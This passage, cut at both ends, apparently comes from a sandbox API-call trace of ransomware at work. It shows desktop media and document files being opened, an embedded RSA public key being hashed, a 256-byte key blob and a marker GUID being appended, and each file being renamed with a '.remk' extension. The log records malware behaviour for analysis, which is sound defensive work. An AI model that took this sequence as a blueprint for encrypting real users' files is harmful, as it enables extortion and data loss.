hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edef0 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edf50 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edef0 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edef0 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf08 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.505] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7d61, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.505] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.505] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.505] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.506] CloseHandle (hObject=0x640) returned 1 [0231.508] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.508] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.508] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QJ1Ktf1WXPHih.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qj1ktf1wxphih.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QJ1Ktf1WXPHih.rtf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qj1ktf1wxphih.rtf.remk")) returned 1 [0231.513] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb62d0, ftCreationTime.dwHighDateTime=0x1d5e3ba, ftLastAccessTime.dwLowDateTime=0xc3d7c250, ftLastAccessTime.dwHighDateTime=0x1d5e6d4, ftLastWriteTime.dwLowDateTime=0xc3d7c250, ftLastWriteTime.dwHighDateTime=0x1d5e6d4, nFileSizeHigh=0x0, nFileSizeLow=0xe845, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rr0jcSeUO8zIEq.wav", cAlternateFileName="RR0JCS~1.WAV")) returned 1 [0231.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.513] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Rr0jcSeUO8zIEq.wav") returned=".wav" [0231.513] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Rr0jcSeUO8zIEq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rr0jcseuo8zieq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.513] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=59461) returned 1 [0231.513] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.516] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe81f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.517] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.520] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xe845, lpOverlapped=0x0) returned 1 [0231.521] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.521] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.521] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.521] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.522] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.522] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.522] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.522] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.522] GetLastError () returned 0x0 [0231.522] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.523] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.523] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.523] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.523] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.523] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.524] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe845, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.524] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.524] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.524] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.524] CloseHandle (hObject=0x640) returned 1 [0231.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.526] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Rr0jcSeUO8zIEq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rr0jcseuo8zieq.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Rr0jcSeUO8zIEq.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rr0jcseuo8zieq.wav.remk")) returned 1 [0231.528] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5aa17070, ftCreationTime.dwHighDateTime=0x1d5dea4, ftLastAccessTime.dwLowDateTime=0xe3979d50, ftLastAccessTime.dwHighDateTime=0x1d5d882, ftLastWriteTime.dwLowDateTime=0xe3979d50, ftLastWriteTime.dwHighDateTime=0x1d5d882, nFileSizeHigh=0x0, nFileSizeLow=0x12a3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rx5o5BD4nL.mp3", cAlternateFileName="RX5O5B~1.MP3")) returned 1 [0231.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.528] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rx5o5BD4nL.mp3") returned=".mp3" [0231.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rx5o5BD4nL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rx5o5bd4nl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.528] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=76349) returned 1 [0231.528] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.532] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12a17, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.533] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.535] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x12a3d, lpOverlapped=0x0) returned 1 [0231.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.536] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.537] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.537] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.537] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.537] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.538] GetLastError () returned 0x0 [0231.538] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.538] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.538] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.538] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.538] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.539] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.539] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12a3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.539] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.540] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.540] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.540] CloseHandle (hObject=0x640) returned 1 [0231.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.542] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rx5o5BD4nL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rx5o5bd4nl.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rx5o5BD4nL.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rx5o5bd4nl.mp3.remk")) returned 1 [0231.543] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8ecd10, ftCreationTime.dwHighDateTime=0x1d5dc9c, ftLastAccessTime.dwLowDateTime=0xc6bc2830, ftLastAccessTime.dwHighDateTime=0x1d5debe, ftLastWriteTime.dwLowDateTime=0xc6bc2830, ftLastWriteTime.dwHighDateTime=0x1d5debe, nFileSizeHigh=0x0, nFileSizeLow=0x13179, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UKwmzFKk1.mp3", cAlternateFileName="UKWMZF~1.MP3")) returned 1 [0231.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.544] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKwmzFKk1.mp3") returned=".mp3" [0231.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKwmzFKk1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukwmzfkk1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.544] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=78201) returned 1 [0231.544] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.547] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13153, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.547] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.555] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x13179, lpOverlapped=0x0) returned 1 [0231.556] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.556] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.557] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.557] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.558] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.558] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.558] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.558] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.558] GetLastError () returned 0x0 [0231.558] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.558] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.558] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.558] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.558] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.559] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.568] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13179, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.618] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.619] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.619] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: 